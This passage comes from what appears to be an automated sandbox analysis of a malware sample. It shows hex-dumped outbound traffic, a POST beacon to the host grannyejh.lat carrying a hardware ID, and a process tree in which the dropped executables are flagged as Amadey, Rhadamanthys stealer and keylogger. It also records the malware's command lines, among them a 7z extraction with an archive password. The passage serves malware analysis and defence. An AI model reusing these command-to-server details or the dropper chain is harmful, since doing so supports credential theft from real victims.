2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: a2 56 f5 32 ef f8 26 1d f4 67 9a 4b 77 62 f5 6b 42 a1 09 1f cc 0b 03 16 b0 fa b9 9e 37 cc 09 92 8a 3a 5b c4 da 14 e1 52 b6 55 14 05 ca f0 1d 69 0f 3b 47 22 a5 1e 99 e9 f9 3b 45 61 4f 49 dc c6 a2 74 06 0c 0f 54 ef 0e 1e de fe a4 b8 c8 25 2e a6 f4 e9 5b 4d 8e b7 a8 99 a6 66 5b 70 37 ea 16 4a b7 91 48 db 96 04 c5 7b 57 a7 48 d1 6b ab c1 f2 2e 3f 35 ca 41 0b 02 d6 3f 9e 7e 72 f9 61 b6 24 d2 6f 52 03 05 a7 1c e8 07 41 e1 86 bb 22 0a 31 91 27 d7 87 57 0d 7b 93 0d 35 fd 46 07 f8 a7 83 17 be 19 56 dc bf 54 fe 59 b0 6a 58 1d c8 6d 7a df 5c c7 da ac 8a a6 d1 aa 6f 6a 57 f4 66 fa 8d 9c e2 a4 7b 24 fb 7d c6 ea 84 e6 ce de c3 db cf 3c 83 39 2f c4 80 eb ca 1a cf 0f 03 68 53 c6 fe 9c ca 21 e1 57 f6 80 68 4e dc a4 1a c8 1b cf 2b 86 00 55 07 ae ba 54 57 b5 0b 84 2c ee 20 Data Ascii: V2&gKwbkB7:[RUi;G";EaOItT%.[Mf[p7JH{WHk.?5A?~ra$oRA"1'W{5FVTYjXmz\ojWf{$}<9/hS!WhN+UTW,
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 9a 1a 2d f1 d8 90 56 4e 32 9b f7 e4 5e 4d a9 ce 85 e0 36 28 90 7e 4b c0 c4 4f bb 6b a8 e8 87 8e ba 5c e8 6c 19 97 5d 94 62 2d c5 11 02 53 f8 d5 81 a1 4a bf bd cc f6 be 9f ba 09 7e e0 d9 46 d7 c1 16 10 32 17 b4 31 1f 35 e3 56 b3 8c 69 c9 e3 2e 1f 15 a6 f7 a3 bf 70 f3 ba b9 42 cb eb f9 dc 20 c4 42 dd 56 57 7a 46 68 4e 0b 84 cd 51 2c 76 5a 4b 3f f6 f5 4a 1d 1c 59 e9 86 6e cc 8a b9 d7 71 2e 43 be 53 fa cf 1e 84 9b 10 fd ce 1f 70 79 87 0f f4 85 53 0f 63 cb ca 91 74 ab 71 d4 1d 9e 17 d2 76 6b 37 44 37 5b 1c bc f8 e7 e4 85 86 c4 b8 97 d8 76 09 b3 e0 95 f9 f4 3f 7a 62 20 a1 67 7d 51 0e 5c 6e eb 12 02 8f 3f 71 05 d6 35 db dc 5e da b4 45 18 87 be 72 c4 10 d0 04 ec e7 2c 67 21 ec 1b d3 42 42 f4 9d 23 a6 85 f9 62 bb cf 8a 99 f0 8c d6 68 e9 d1 ba 4a fa 45 90 55 ce c6 Data Ascii: -VN2^M6(~KOk\l]b-SJ~F215Vi.pB BVWzFhNQ,vZK?JYnq.CSpySctqvk7D7[v?zb g}Q\n?q5^Er,g!BB#bhJEU
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 0a 7e 5c 91 ce a1 bf 40 93 3f 3a bc b3 27 a7 95 66 83 d4 c8 3f 74 2c cd c4 28 96 92 78 98 6c 06 4b 6f 75 e8 68 40 8a c6 e9 e5 5b 7e 5e 7a d7 05 10 72 32 1f b3 22 4c 0c 19 17 5d f4 50 fc cb ed e8 dc 2b aa 29 59 49 85 49 36 94 cd bf df 1e c9 27 7a 81 8b 4d c9 5d ac b7 5e 35 51 91 71 e2 3b a5 de 20 db 1e 87 b6 ad f2 0a 4c ff bd 59 ea 5b 4d 4f e4 b1 16 18 f7 18 ac c6 71 38 c7 c7 d9 1e f1 4c 8d 0e c7 c6 6d 1d 00 a3 86 72 54 fc 38 40 70 54 c4 76 77 8f b4 10 2d e4 c3 e3 36 af a4 33 fc b8 7b 34 28 0f 12 17 44 47 bf 8b 58 48 2a 9e 60 35 ea 52 0f e8 a1 bc 7c 0b 1b 6e f9 4b 64 3a e2 3e 2d 98 cc 55 da b8 de ca 35 88 c2 27 0e b6 21 44 f4 20 d3 77 35 bd 66 0e 96 03 77 a3 42 a6 66 8a be 55 67 c7 16 e8 21 bd 1c ba a9 07 e3 59 97 31 0a e1 e9 08 92 6c 51 09 7a 57 54 d8 65 Data Ascii: ~\@?:'f?t,(xlKouh@[~^zr2"L]P+)YII6'zM]^5Qq; LY[MOq8LmrT8@pTvw-63{4(DGXH*`5R\|nKd:>-U5'!D w5fwBfUg!Y1lQzWTe
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 76 d2 e7 2e 50 9c de ca db 2b 5c 94 fa d0 01 5e 17 63 ff 36 a5 5c 6c b8 14 11 05 77 8b 0a 72 3d 74 46 1b d2 e0 39 5d f2 01 73 2a bc fe a2 0b e9 2c f3 8b b8 f8 4f f6 8f ff e2 9e 15 2b 83 6c 8d 3a 19 74 c9 32 c9 72 38 e4 3a ae 40 e1 d9 b2 2d 0f d0 5e 45 b4 b9 c1 35 27 4c 9b cd ab fb 25 95 51 6b 1a 94 f1 b9 42 21 ee 62 95 65 15 2f 09 67 58 4d d4 2d e8 c7 5c b3 e3 3f 8a 71 cd 24 49 70 63 84 a8 5d 38 da 25 89 57 e3 46 3b 57 ea a0 eb e7 31 d4 e4 86 30 3f 05 d2 eb be c8 25 4d ed 1f 9a b8 e5 75 6f 4d 1e 72 79 ef 79 dc 5d e6 b9 45 70 4d 40 6a 29 ff 6e 03 02 83 f8 b7 f8 ed e9 eb 8a ea 88 0e 1e 52 74 84 d8 46 77 bf 05 c3 02 60 db 9b 42 ff 0e a7 c6 dd 5f bb 35 94 fc 5b 51 06 53 b2 33 7d 83 f9 48 53 e0 af e1 30 df 59 11 ca 81 ca 89 21 02 3a 84 6f 59 8f d0 5e 47 f0 13 Data Ascii: v.P+\^c6\lwr=tF9]s*,O+l:t2r8:@-^E5'L%QkB!be/gXM-\?q$Ipc]8%WF;W10?%MuoMryy]EpM@j)nRtFw`B_5[QS3}HS0Y!:oY^G
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 33 dd 66 fe 46 11 76 31 f1 c4 54 d5 1f d3 8c 13 b1 e2 d8 f2 c5 a1 a4 3a ca ec 97 58 57 84 d3 6a 79 27 0e 48 98 ef dc fc 25 04 fc 85 f9 fe 77 83 cb 8f 54 b8 ea 11 10 86 a8 0c 68 67 c0 00 66 8e 8f ea 9c 8d 7a 33 8c 2d c8 c3 28 b9 40 00 d5 65 2e 60 a7 94 81 86 75 64 72 83 33 2f c1 c7 df 2a 72 f9 98 e1 92 a6 a6 6a fc 25 b2 2f d2 0c 15 b1 40 7b d9 7c 7b bf a8 9c 2a d4 c1 c8 f7 e3 1c 30 12 d0 e7 88 e1 0e f3 78 0c 86 fe d9 ea b4 2c 30 40 05 9d 71 c9 1c 0e 58 45 5d 1f 49 6f dd b8 7a e4 d9 21 67 34 cc 87 86 00 2f 0b 0b ca 62 d5 ae d6 f4 f4 37 e9 ef dc 2e ce a0 d5 92 66 be ab e4 16 b6 9a 98 68 4b e4 1e 22 25 20 62 33 48 cd c6 6e 57 1b f6 b3 48 13 9a 3b e9 8a 35 f6 d5 5b bc 04 10 9d 74 59 70 1e e1 16 1e 94 e7 b2 c5 c8 29 ca 27 31 c6 cd e5 58 03 a6 43 3f 26 cf 1b 2d Data Ascii: 3fFv1T:XWjy'H%wThgfz3-(@e.`udr3/rj%/@{\|{0x,0@qXE]Ioz!g4/b7.fhK"% b3HnWH;5[tYp)'1XC?&-
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: 7e 6f f7 56 a0 e6 8c f3 37 59 c8 36 32 ac 56 22 ef 20 93 91 ff 5b c6 4d db ff f4 a3 35 02 37 7d 8e 96 cc bd 53 2e bc 44 ea d2 16 56 66 33 7a bf 4c be 58 09 60 ec 05 af cc 50 e7 8b 29 c2 6f f3 03 59 76 2d bb 58 21 c1 3a 91 bf f6 ae 44 54 73 df 96 9f 5a 1f ff 2c 09 f0 d6 bf a2 14 7a 59 8b d9 b5 dc 4f d9 fc 33 72 3a 1f d7 f3 ae 08 d6 60 d7 9d bd 61 69 dc 54 14 3c 10 94 e2 fd 0c fd 6f 50 cb c7 1d 42 23 e1 46 2b 30 da 3f c1 48 1e 51 91 ad e4 4d ad f0 ea 2b 5b 1e f6 02 98 65 fa 7e c5 83 9f 1a f6 6b 82 64 b6 8d af d5 d7 ad c3 98 40 24 ed ba 28 43 64 76 7e 86 71 b2 b6 25 9a 42 12 16 f6 57 cc 16 2e f1 6c 77 08 4e 37 04 c1 cb 1e 11 65 e5 37 5d 75 97 86 fc 1a 36 80 c8 89 40 1e 23 a5 65 a9 4a 4a c0 95 33 df c0 b0 6d 7e 6f 82 4b 61 8c 57 76 6c 25 5c 05 ec 96 ce aa 9d Data Ascii: ~oV7Y62V" [M57}S.DVf3zLX`P)oYv-X!:DTsZ,zYO3r:`aiT<oPB#F+0?HQM+[e~kd@$(Cdv~q%BW.lwN7e7]u6@#eJJ3m~oKaWvl%\
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: f5 8d 2d ca 98 79 03 5a 29 0e 28 20 ba 12 6c db 41 72 61 1a ef 49 d1 23 b2 53 76 f8 f1 9e 8b 17 9c b0 4a 9b e7 17 e9 d5 19 a3 a6 8c 7f ba d1 40 b8 12 6f f3 8f 9d 5e 02 ed 17 a3 cb ee c3 f9 01 98 1d db da 56 18 f1 f8 f9 d3 01 22 06 17 81 39 e7 13 95 b8 f6 c1 94 5a cf d4 1f ff 34 7f 7c d0 1a eb 37 df 94 4e 9d 9e df 83 a9 75 a6 24 a2 f6 a0 9a 56 18 4a 52 4b be b4 bf 80 d7 97 b8 83 e1 a2 6b 86 e8 d6 bc fd 91 55 6b fd 0e 90 2e ba ad f6 56 a1 80 7e 5c 2f 3e 8c 58 4d 43 f0 0d db 4e 15 5e 47 89 cb 11 6b a6 90 e0 96 1e 8f f5 eb 41 a5 47 c1 de 82 ef 8e ba 59 55 db 04 05 f6 f6 bc e5 d3 b0 08 f8 ba d2 a0 5f ca c7 a3 4f 83 c7 bb 68 3e eb 27 a4 45 be aa 2a 1e a2 1c de 43 2f df 08 c7 84 1b 7f d3 95 5b d9 bc b7 ad 02 01 73 96 b7 1e 3b cc 4c 5f ef d1 85 29 cd 68 95 ce 2c Data Ascii: -yZ)( lAraI#SvJ@o^V"9Z4\|7Nu$VJRKkUk.V~\/>XMCN^GkAGYU_Oh>'E*C/[s;L_)h,
2024-12-18 12:43:19 UTC	15331	OUT	Data Raw: a3 81 5e e7 95 57 bf 37 62 37 97 84 f2 d8 45 d5 cb 9a 4e 2b 5c 55 6f 6c e4 50 de 50 b3 c7 fd c3 d8 0f 6a d5 79 e6 00 bf d3 6a 91 a1 dc 19 83 1f f5 1f bb 32 6f cd ea e4 f9 cb 3d ef 98 31 c4 2e be 4c 8f fe 9e ec 10 10 74 62 b5 92 b9 95 57 d5 a1 f3 c9 31 6b 6e 21 6b e5 1d 69 c2 d3 4a db c4 28 c8 31 00 2e bc f6 6b db be a3 05 94 e4 5e 5f ac 10 cd de ce 46 24 3a ec 36 5b 64 0c fa 25 ba b3 a6 4f 8e cf 60 ae b5 2e 78 b1 45 90 68 e7 2b 12 aa 8c 0d 9e 82 47 8b 7f 06 b1 e4 58 57 bf a6 66 2e 4d 9e 01 07 83 2c 5e 72 82 75 80 1c a3 d9 90 5c 95 fd 38 ec 05 02 23 07 64 87 c7 63 67 75 2f 54 ef 2c d8 08 92 9e 34 c4 e0 17 fa 9a 4b ea 5d 30 07 a0 01 fa 67 bf d9 d5 1c b9 3f 0c df 8f e7 c6 af 8f 3b 55 2c e8 ed 4a 82 b6 2d 7d fb e1 2e 13 f9 d0 64 81 61 fa 00 a6 4c c8 fd 84 e5 Data Ascii: ^W7b7EN+\UolPPjyj2o=1.LtbW1kn!kiJ(1.k^_F$:6[d%O`.xEh+GXWf.M,^ru\8#dcgu/T,4K]0g?;U,J-}.daL
2024-12-18 12:43:22 UTC	1042	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2dkatd8p2ubetu4ic4lqp7qda8; expires=Sun, 13-Apr-2025 06:30:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aIuRutkZw6%2FJEa1ClBlnvhi4S2zCZPTX0PPQgp07sVG%2FvQioy9hulFLUyIO9yUX6Ol%2Bu6kv3HXTMMdeiEZOJ87RWAhSK3IMqOKk%2BZC%2B7HCIPW6XLuWv%2FUxCSX6I7Imt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3ce6d95818c4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1463&rtt_var=568&sent=326&recv=614&lost=0&retrans=0&sent_bytes=2830&recv_bytes=587809&delivery_rate=1894873&cwnd=169&unsent_bytes=0&cid=650074800375487b&ts=3221&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.8	50114	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:43:23 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: grannyejh.lat
2024-12-18 12:43:23 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d 26 68 77 69 64 3d 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6989783370&j=&hwid=59DA74536B732CCB00D57F9DDD37BE0C
2024-12-18 12:43:24 UTC	1037	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e3ufebjq1bbfgstqrb0ogrqpn7; expires=Sun, 13-Apr-2025 06:30:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2FxFT1KlIL5YTmjzxgeHBT9ekKz2U%2BzPmAzbVOAM%2BRG%2FDvEqntI4vMASws%2BVuwh1uHgw9ut5Df7WgedrzYiCP%2FKJM%2BzEHYYsQCf8PiGqgyDYmKIl9POkiKl07lseuS60"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3d031ee40f64-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1505&rtt_var=572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=984&delivery_rate=1902280&cwnd=233&unsent_bytes=0&cid=94747ed8d1dedfc4&ts=1007&x=0"
2024-12-18 12:43:24 UTC	54	IN	Data Raw: 33 30 0d 0a 48 70 76 4f 36 39 36 67 6a 52 50 77 4d 72 57 6b 6e 4e 78 36 33 58 6c 75 51 6c 74 62 44 30 52 64 51 47 41 6e 55 51 4b 58 39 73 70 46 78 67 3d 3d 0d 0a Data Ascii: 30HpvO696gjRPwMrWknNx63XluQltbD0RdQGAnUQKX9spFxg==
2024-12-18 12:43:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:37:48
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x9d0000
File size:	2'953'216 bytes
MD5 hash:	157E44350B06A516680ED7B7584C5E31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1500511815.00000000009D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1455149743.0000000004820000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:37:51
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x900000
File size:	2'953'216 bytes
MD5 hash:	157E44350B06A516680ED7B7584C5E31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1483791860.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1524174368.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:37:51
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x900000
File size:	2'953'216 bytes
MD5 hash:	157E44350B06A516680ED7B7584C5E31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.1530404067.0000000000901000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.1485484180.0000000004630000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:38:00
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x900000
File size:	2'953'216 bytes
MD5 hash:	157E44350B06A516680ED7B7584C5E31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.1570343536.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:38:13
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe"
Imagebase:	0x490000
File size:	1'943'040 bytes
MD5 hash:	DC132B79455BC816EDE67EDFF521215C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.1721407127.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.1716803136.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:38:15
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:	0xdb0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000008.00000003.1721363531.0000000000CB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000008.00000002.1732609281.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:38:16
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 652
Imagebase:	0xd00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:38:20
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"
Imagebase:	0x300000
File size:	765'568 bytes
MD5 hash:	8A9CB17C0224A01BD34B46495983C50A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 71%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:38:20
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:38:23
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe"
Imagebase:	0x300000
File size:	765'568 bytes
MD5 hash:	8A9CB17C0224A01BD34B46495983C50A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2064174110.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2065590951.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2064564073.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.2064724711.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:38:26
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"
Imagebase:	0x190000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 74%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:38:27
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:38:30
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe"
Imagebase:	0x190000
File size:	776'832 bytes
MD5 hash:	AFD936E441BF5CBDB858E96833CC6ED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:38:39
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe"
Imagebase:	0x1b0000
File size:	4'471'808 bytes
MD5 hash:	A326CDB677DE0DFFBC5BEB2970B80AC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	07:38:51
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	07:38:57
Start date:	18/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff6952a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	07:38:57
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	07:38:58
Start date:	18/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff6424d0000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:38:58
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:38:58
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0xc40000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:38:58
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
